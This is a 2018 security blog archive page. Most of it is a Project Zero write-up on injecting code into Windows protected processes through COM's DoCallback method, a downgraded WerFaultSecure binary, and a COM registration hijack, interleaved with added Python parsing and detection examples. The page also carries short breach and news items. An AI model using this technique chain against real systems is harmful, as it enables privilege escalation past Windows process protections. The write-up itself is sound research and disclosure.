Monthly Archives: November 2018

SaferVPN review: This newcomer is off to a good start

SaferVPN in brief:

  • P2P allowed: Netherlands server only
  • Business location: Tel Aviv, IL
  • Number of servers: 700
  • Number of country locations: 34
  • Monthly cost: $65.88 billed annually, or $78.96 for two years
  • VPN protocol: IKEv2 (default with OpenVPN as fallback)
  • Data encryption: AES-256
  • Data authentication: SHA-256
  • Handshake encryption: 2048-bit

Editor’s Note: This review was updated November 29, 2018 to reflect changes to infrastructure, improved speed scores, and a new overall review score.


Affected by a Data Breach? 6 Security Steps You Should Take

It’s common for people to share their personal information with companies for multiple reasons. Whether you’re checking into a hotel room, using a credit card to make a purchase at your favorite store, or collecting rewards points at your local coffee shop, companies have more access to your data than you may think. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

A high-profile hotel and another popular consumer brand’s perks program recently experienced data breaches that exposed users’ personal information. If you think you were affected by one of these breaches, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a data breach, or just want to take extra precautions:

  • Change your password. Most people will rotate between the same three passwords for all of their personal accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Update your privacy settings. Be careful with how much of your personal information you share online. Make sure your social media accounts and mobile apps are on private and use multi-factor authentication to prevent your accounts from being hacked.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.


The post Affected by a Data Breach? 6 Security Steps You Should Take appeared first on McAfee Blogs.

Are US hacker indictments more than Justice Theater?

Hacker indictments by the U.S. Justice Department haven’t proven effective and now the Treasury Department is also getting in on the act with questionable sanctions.

In the past five months alone, the U.S. Department of Justice has indicted at least 30 foreign individuals in connection with various cyberattacks, but only three of those individuals were arrested and extradited to the U.S. That raises the question of whether legal action is little more than “justice theater,” akin to Bruce Schneier’s “security theater” put on by the likes of the TSA.

In July, special counsel Robert Mueller indicted 12 Russian intelligence officers in connection with the DNC and DCCC hacks; in September, one member of the North Korean Lazarus Group was indicted; in October, seven more Russian officers were indicted; and November saw eight Russian nationals indicted for running a massive botnet — three of whom are in custody — and two Iranians in connection to the SamSam ransomware.

Before this month, to find a foreign national who was indicted and detained (setting aside whether trial proceedings have begun), you have to go back to Aug. 2017 and Marcus Hutchins, aka MalwareTech, a British security researcher detained after attending Defcon 2017 in Las Vegas.

Along with the latest hacker indictment of two Iranian nationals, the Treasury Dept. designated two additional Iranian men for their role in exchanging the bitcoin earned in ransomware attacks into Iranian rial.

According to the Treasury Dept., a designation action means, “all property and interests in property of the designated persons that are in the possession or control of U.S. persons or within or transiting the United States are blocked, and U.S. persons generally are prohibited from dealing with them.”

However, considering the “property” in this context is a decentralized cryptocurrency, it’s unclear what — if anything — this action means in real world terms. Unlike assets held by a U.S. bank or bank in a friendly nation, a bitcoin wallet doesn’t fall under any authority’s jurisdiction.

Making the case worse for the Treasury Dept., neither bitcoin wallet had a meaningful balance at the time of the designation announcement. One of the wallets hadn’t seen activity since Dec. 2017 — until receiving two payments the day after the Treasury announcement — and the other had a balance equivalent to just over $3 as of Nov. 11, before receiving two payments each on the day of and the day after the announcements.

The two bitcoin wallets combined received a total of 5901.4 BTC while in use, but the value of that is difficult to calculate because of the high volatility of bitcoin prices over the past year and the owners of the wallets always being quick to send funds to other accounts. It’s possible the amount of bitcoin was worth tens of millions of U.S. dollars.

That’s tens of millions of dollars sent to dozens or hundreds of different accounts going back to 2013, and all but about $3 of which was gone before the Treasury Dept. announced any actions.

At least with the indictments, the DoJ can theoretically limit the travel of the individuals charged or seize assets in America. The Treasury Dept. has put sanctions on two men who most likely won’t be extradited, and is attempting to “block” property that was gone before any action was taken. That feels like peak justice theater.

The post Are US hacker indictments more than Justice Theater? appeared first on Security Bytes.

OSSEC For Website Security: PART II – Distributed Architectures Using Agents and Managers

This article assumes you already have OSSEC deployed. If you need a refresher, refer to the Part I of OSSEC for website security, written March 2013. OSSEC is popular open-source...


The post OSSEC For Website Security: PART II – Distributed Architectures Using Agents and Managers appeared first on PerezBox.

Hacker hijacks 50,000 printers to tell people to subscribe to PewDiePie

Over the course of this week, some printers have been printing out a strange message asking people to subscribe to PewDiePie's YouTube channel. The message appears to be the result of a simple exploit that allows printers to receive data over the internet, including print commands. A person with the online handle TheHackerGiraffe has claimed responsibility for the attack.

Via: The Verge

Source: TheHackerGiraffe

Marriott Hotels 4 Year Hack Impacts Half a Billion Guests!

A mammoth data breach was disclosed by hotel chain Marriott International today (30 Nov 18), with a massive 500 million customer records said to have been compromised by an "unauthorized party". 
The world's largest hotel group launched an internal investigation in response to a system security alert on 8th September 2018, and found an attacker had been accessing the hotel chain's "Starwood network" and customer personal data since 2014, copying and encrypting customer records. In addition to the Marriott brand, Starwood includes W Hotels, Sheraton, Le Méridien and Four Points by Sheraton. 

You are at risk if you have stayed at any of the above hotel brands in the last 4 years

The Marriott statement said that for around 326 million of its guests, the personal information compromised included "some combination" of name, address, phone number, email address, passport number, date of birth, gender and arrival & departure information. The hotelier also said encrypted payment card data was copied, and it could not rule out that the encryption keys needed to decrypt cardholder data had also been stolen.

The hotel giant said it would notify customers affected and offer some a fraud detecting service for a year for free, so I expect they will be making contact with myself soon. In the meantime, Marriott has launched a website for affected customers and a free helpline for concerned UK customers 0808 189 1065.

The UK ICO said it would be investigating the breach, and warned those who believe they are impacted to be extra vigilant and to follow the advice on the ICO website, and by the National Cyber Security Centre. The hotel chain could face huge fines under the GDPR, and possibly a large scale class action lawsuit by their affected guests, which could cost them millions of pounds.

What I really would like to know is why the hotel chain had retained such vast numbers of guest records post their stay. Why they held their customer's passport details and whether those encryption keys were stolen or not. And finally, why the unauthorised access went undetected for four years.

Tom Kellermann, Chief Cybersecurity Officer for Carbon Black, said "It appears there had been unauthorised access to the Starwood network since 2014, demonstrating that attackers will get into an enterprise and attempt to remain undetected. A recent Carbon Black threat report found that nearly 60% of attacks now involve lateral movement, which means attackers aren’t just going after one component of an organisation - they’re getting in, moving around and seeking more targets as they go."

The report also found that 50% of today’s attackers now use the victim primarily for island hopping. In these campaigns, attackers first target an organisation's affiliates, often smaller companies with immature security postures and this can often be the case during an M&A. This means that data at every point in the supply chain may be at risk, from customers, to partners and potential acquisitions.”

Jake Olcott, VP of Strategic Partnerships at BitSight, said "Following the breaking news today that Marriott’s Starwood bookings database has been compromised with half a billion people affected, it highlights the importance of organisations undertaking sufficient security posture checks to avoid such compromises. Marriott’s acquisition of Starwood in 2016 allowed it to utilise its Starwood customer database. Therefore, proactive due diligence during this acquisition period would have helped Marriott to identify the potential cybersecurity risks, and the impact of a potential breach".

“This is yet another example of why it is critical that companies perform cybersecurity analysis during the due diligence period, prior to an acquisition or investment. Traditionally, companies have approached cyber risk in acquisitions by issuing questionnaires to the target company; unfortunately, these methods are time consuming and reflect only a “snapshot in time” view.

“Understanding the cybersecurity posture of an investment is critical to assessing the value of the investment and considering reputational, financial, and legal harm that could befall the company. After an investment has been made, continuous monitoring is essential.”

Injecting Code into Windows Protected Processes using COM – Part 2

Posted by James Forshaw, Project Zero

In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.

As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.

Finding a New Target

My first thought to exploit full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls I don’t want to require administrator privileges to inject code into the process.

I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.

| Path | Signing Level |
| --- | --- |
| C:\windows\system32\GenValObj.exe | Windows |
| C:\windows\system32\sppsvc.exe | Windows |
| C:\windows\system32\WerFaultSecure.exe | WindowsTCB |
| C:\windows\system32\SgrmBroker.exe | WindowsTCB |

As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface, the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.

The SgrmBroker executable doesn’t do very much at all, it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard and didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level through hijacking a COM object load in WerFaultSecure. Even though WerFaultSecure didn’t expose a service, if it could initialize COM perhaps there was something that I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.

Digging into COM Remoting Internals

Communication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:


In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.

The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaled Object Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’s IObjectExporter RPC interface. The prototype of ResolveOxid is as follows:

interface IObjectExporter {
  // ...
  error_status_t ResolveOxid(
    [in] handle_t hRpc,
    [in] OXID* pOxid,                                // OXID to resolve
    [in] unsigned short cRequestedProtseqs,
    [in] unsigned short arRequestedProtseqs[],
    [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,  // RPC endpoints for the OXID
    [out, ref] IPID* pipidRemUnknown,                // IPID of IRemUnknown
    [out, ref] DWORD* pAuthnHint                     // authentication level hint
  );
  // ...
}

In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.

An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRef and RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.
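To make the OXID and IPID discussed above concrete, here is an added example (not code from the original post or from OleViewDotNet) that parses a marshaled standard OBJREF, following the layout published in Microsoft's MS-DCOM specification, and pulls out the OXID, OID, IPID and string bindings. The sample bytes, the OXID/OID/IPID values and the address are constructed for illustration.

```python
import struct
import uuid

OBJREF_SIGNATURE = 0x574F454D   # the bytes "MEOW" read as a little-endian DWORD
OBJREF_STANDARD = 0x00000001    # flags value for a standard object reference
TOWER_NAMES = {0x07: "ncacn_ip_tcp"}  # other tower ids are reported in hex


def _read_string_bindings(words):
    """Split 16-bit words into (tower id, address) pairs; a lone 0 ends the list."""
    out, i = [], 0
    while i < len(words) and words[i] != 0:
        tower = words[i]
        i += 1
        chars = []
        while i < len(words) and words[i] != 0:
            chars.append(chr(words[i]))
            i += 1
        i += 1  # skip the address's null terminator
        out.append((TOWER_NAMES.get(tower, hex(tower)), "".join(chars)))
    return out


def parse_objref(data: bytes) -> dict:
    """Parse OBJREF header + STDOBJREF + DUALSTRINGARRAY (standard form only)."""
    if len(data) < 68:
        raise ValueError("too short for a standard OBJREF")
    signature, flags = struct.unpack_from("<II", data, 0)
    if signature != OBJREF_SIGNATURE:
        raise ValueError("missing MEOW signature")
    if flags != OBJREF_STANDARD:
        raise ValueError("only OBJREF_STANDARD is handled here")
    iid = uuid.UUID(bytes_le=data[8:24])
    # STDOBJREF: flags, cPublicRefs, oxid, oid, then the 16-byte IPID
    std_flags, public_refs, oxid, oid = struct.unpack_from("<IIQQ", data, 24)
    ipid = uuid.UUID(bytes_le=data[48:64])
    # DUALSTRINGARRAY: wNumEntries, wSecurityOffset, then wNumEntries words
    num_entries, security_offset = struct.unpack_from("<HH", data, 64)
    if security_offset > num_entries or len(data) < 68 + 2 * num_entries:
        raise ValueError("DUALSTRINGARRAY lengths are inconsistent")
    words = struct.unpack_from("<%dH" % num_entries, data, 68)
    return {
        "iid": iid,
        "public_refs": public_refs,
        "oxid": oxid,
        "oid": oid,
        "ipid": ipid,
        "string_bindings": _read_string_bindings(words[:security_offset]),
    }


def build_sample() -> bytes:
    """Constructed OBJREF for IUnknown; every value here is made up."""
    string_part = [0x07] + [ord(c) for c in "127.0.0.1[49152]"] + [0, 0]
    security_part = [0x0A, 0xFFFF, 0, 0]
    words = string_part + security_part
    header = struct.pack("<II", OBJREF_SIGNATURE, OBJREF_STANDARD)
    iid = uuid.UUID("00000000-0000-0000-C000-000000000046").bytes_le
    std = struct.pack("<IIQQ", 0, 5, 0x1122334455667788, 0x0102030405060708)
    ipid = uuid.UUID("0000a001-1b2c-0000-1234-56789abcdef0").bytes_le
    dsa = struct.pack("<HH%dH" % len(words), len(words), len(string_part), *words)
    return header + iid + std + ipid + dsa


if __name__ == "__main__":
    ref = parse_objref(build_sample())
    print("OXID %#018x  IPID %s  bindings %s"
          % (ref["oxid"], ref["ipid"], ref["string_bindings"]))
```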

The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.


In this example screenshot there’s actually two IPIDs exported, IRundown and a Windows.Foundation interface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNames and ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and lookup names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of the IRundown interface. After cleanup the IRundown interface looks like the following:

[uuid("00000134-0000-0000-c000-000000000046")]
interface IRundown : IUnknown {
   HRESULT RemQueryInterface(...);
   HRESULT RemAddRef(...);
   HRESULT RemRelease(...);
   HRESULT RemQueryInterface2(...);
   HRESULT RemChangeRef(...);
   HRESULT DoCallback([in] struct XAptCallback* pCallbackData);
   HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);
   HRESULT AcknowledgeMarshalingSets(...);
   HRESULT GetInterfaceNameFromIPID(...);
   HRESULT RundownOid(...);
}

This interface is a superset of IRemUnknown, it implements the methods such as RemQueryInterface and then adds some more additional methods for good measure. What really interested me was the DoCallback and DoNonreentrantCallback methods, they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):

struct XAptCallback {
 void* pfnCallback;
 void* pParam;
 void* pServerCtx;
 void* pUnk;
 void* iid;
 int   iMethod;
 GUID  guidProcessSecret;
};

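HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData) {
 // Fetch this process's randomly generated secret.
 GUID guidProcessSecret;
 CProcessSecret::GetProcessSecret(&guidProcessSecret);
 // Only a caller that already knows the secret gets past this check.
 if (!memcmp(&guidProcessSecret,
             &pCallbackData->guidProcessSecret, sizeof(GUID))) {
   if (pCallbackData->pServerCtx == GetCurrentContext()) {
     // Already in the requested context: call the supplied pointer directly.
     return pCallbackData->pfnCallback(pCallbackData->pParam);
   } else {
     // Otherwise switch to the requested context before making the call.
     return SwitchForCallback(
                  pCallbackData->pServerCtx,
                  pCallbackData->pfnCallback,
                  pCallbackData->pParam);
   }
 }
 return E_INVALIDARG;
}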

This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method is you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.

What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important as calling methods between apartments, say calling a STA object from a MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent the DoCallback method being abused OOP the per-process secret is checked which should limit it to only in-process callers, unless an external process can read the secret from memory.

Abusing DoCallback

We have a primitive to execute arbitrary code within any process which has initialized COM by invoking the DoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:

  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem, one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?

Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.

First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version of WerFaultSecure.

Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:

  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work and needed administrator privileges which I wanted to avoid. I needed to come up with an alternative solution.

Using WerFaultSecure for its Original Purpose

Up to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels. WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?

The reason we can’t use WerFaultSecure is it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used getting the encrypted data seems like a non-starter.

However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process, first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted which means that you don’t even need to race the encryption process.

There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypted the crash dump directly, it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version of WerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website, extracted the binary and tested it, with predictable results:


We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks to bypass WinRT UMCI signing so generalizing might make some sense, especially for certain PP levels.

After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to be passed to the WerFaultSecure process to perform a dump of a PP:

| Parameter | Description |
| --- | --- |
| /h | Enable secure dump mode. |
| /pid {pid} | Specify the Process ID to dump. |
| /tid {tid} | Specify the Thread ID in the process to dump. |
| /file {handle} | Specify a handle to a writable file for the unencrypted crash dump. |
| /encfile {handle} | Specify a handle to a writable file for the encrypted crash dump. |
| /cancel {handle} | Specify a handle to an event to indicate the dump should be cancelled. |
| /type {flags} | Specify MINIDUMP_TYPE flags for the call to MiniDumpWriteDump. |

This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecure with COM initialized and use the crash dump to extract all the information we need including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.
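From the defender's side, the downgrade described above leaves traces in process-creation telemetry. The following added example (not part of the original post) checks events for a WerFaultSecure binary running from outside the system directories, carrying a file version that does not match the host OS, or started with the /file parameter from the table. Field names follow Sysmon's process-creation event; the events, paths, version strings and the host version "10.0" are constructed assumptions.

```python
import ntpath

TARGET = "werfaultsecure.exe"
# Assumed install locations (64-bit and 32-bit copies) on a default system drive.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def major_minor(file_version: str) -> str:
    """'6.3.9600.17415 (build tag)' -> '6.3'; empty string if unparsable."""
    fields = file_version.split()
    if not fields:
        return ""
    return ".".join(fields[0].split(".")[:2])


def check_event(event: dict, os_version: str = "10.0") -> list:
    """Return the list of findings for one process-creation event."""
    image = event.get("Image", "")
    names = {ntpath.basename(image).lower(),
             event.get("OriginalFileName", "").lower()}
    if TARGET not in names:
        return []
    findings = []
    # A copy of the binary executed from a user-writable location.
    if ntpath.dirname(image).lower() not in SYSTEM_DIRS:
        findings.append("image-outside-system-dir")
    # A validly signed binary taken from a different Windows release.
    if major_minor(event.get("FileVersion", "")) != os_version:
        findings.append("binary-version-mismatch")
    # The parameter that names a handle for the unencrypted dump.
    if "/file" in event.get("CommandLine", "").lower().split():
        findings.append("unencrypted-dump-handle")
    return findings


def scan(events: list, os_version: str = "10.0") -> dict:
    """Map event index -> findings, keeping only events that raised something."""
    results = {}
    for index, event in enumerate(events):
        findings = check_event(event, os_version)
        if findings:
            results[index] = findings
    return results


# Constructed sample events; real command lines and versions will differ.
EVENTS = [
    {"Image": r"C:\Windows\System32\WerFaultSecure.exe",
     "OriginalFileName": "WerFaultSecure.exe",
     "FileVersion": "10.0.17134.1 (constructed)",
     "CommandLine": r"C:\Windows\System32\WerFaultSecure.exe /h /pid 4120 /tid 4124 /encfile 912 /cancel 916 /type 0x22"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\WerFaultSecure.exe",
     "OriginalFileName": "WerFaultSecure.exe",
     "FileVersion": "6.3.9600.17415 (constructed)",
     "CommandLine": r"WerFaultSecure.exe /h /pid 5500 /tid 5504 /file 640 /encfile 644 /cancel 648 /type 0x22"},
    {"Image": r"C:\Users\alice\Desktop\svc.exe",
     "OriginalFileName": "WerFaultSecure.exe",
     "FileVersion": "6.3.9600.17415 (constructed)",
     "CommandLine": r"svc.exe /h /pid 5500 /tid 5504 /encfile 644 /cancel 648 /type 0x22"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE",
     "FileVersion": "10.0.17134.1 (constructed)",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for index, findings in scan(EVENTS).items():
        print(index, EVENTS[index]["Image"], findings)
```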

Putting it All Together

There’s still two things we need to complete the exploit, how to get WerFaultSecure to start up COM and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.

Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, this results in a call to the method CCrashReport::ExemptFromPlmHandling inside the FaultRep DLL resulting in the loading of CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.

Unfortunately I’ve not been entirely truthful during my description of how COM remoting is set up. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense: if all COM calls are to code within the same apartment, then why bother to initialize the entire remoting code for COM? In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to set up remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER which means we can hijack it without needing administrator privileges.


Unfortunately, looking at the code, this won’t work. A cut-down version is shown below:

HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId) {
  // The calling thread joins a single-threaded apartment (STA).
  CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
  IOSTaskCompletion* inf;
  // CLSCTX_INPROC_SERVER restricts activation to in-process registrations.
  HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,
      NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));
  if (SUCCEEDED(hr)) {
    // Open process and disable PLM handling.
  }
  return hr;
}

The code passes the flag CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way: the code is initializing the current thread’s COM apartment as an STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object, its threading model is set to “Both”. What this means in practice is the object supports being called directly from either an STA or an MTA.

However, if the threading model was instead set to “Free” then the object only supports direct calls from an MTA, which means the COM runtime will have to enable remoting, create the object in an MTA (using something similar to DoCallback) then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features including IRundown. As we can hijack the server registration we can just change the threading model, this will cause WerFaultSecure to start COM remoting which we can now exploit.
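From the defender's side, the registration change described above leaves a registry artifact: a per-user InprocServer32 key that shadows the machine-wide one with a different ThreadingModel. The following is an added example, not code from the original post; it parses a .reg export and flags such shadowing. The DLL paths and the second CLSID in the sample are constructed.

```python
import re

# CLSID named in the post; every other identifier in the sample is constructed.
WATCHED_CLSID = "{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}"

KEY_RE = re.compile(r"^\[(HKEY_[A-Z_]+)\\(.+)\]$")
VALUE_RE = re.compile(r'^(?:@|"([^"]+)")="(.*)"$')
INPROC_RE = re.compile(
    r"^Software\\Classes\\CLSID\\(\{[0-9A-F-]{36}\})\\InprocServer32$", re.I)


def parse_reg_export(text):
    """Collect string values from a .reg export as {(hive, key): {name: data}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
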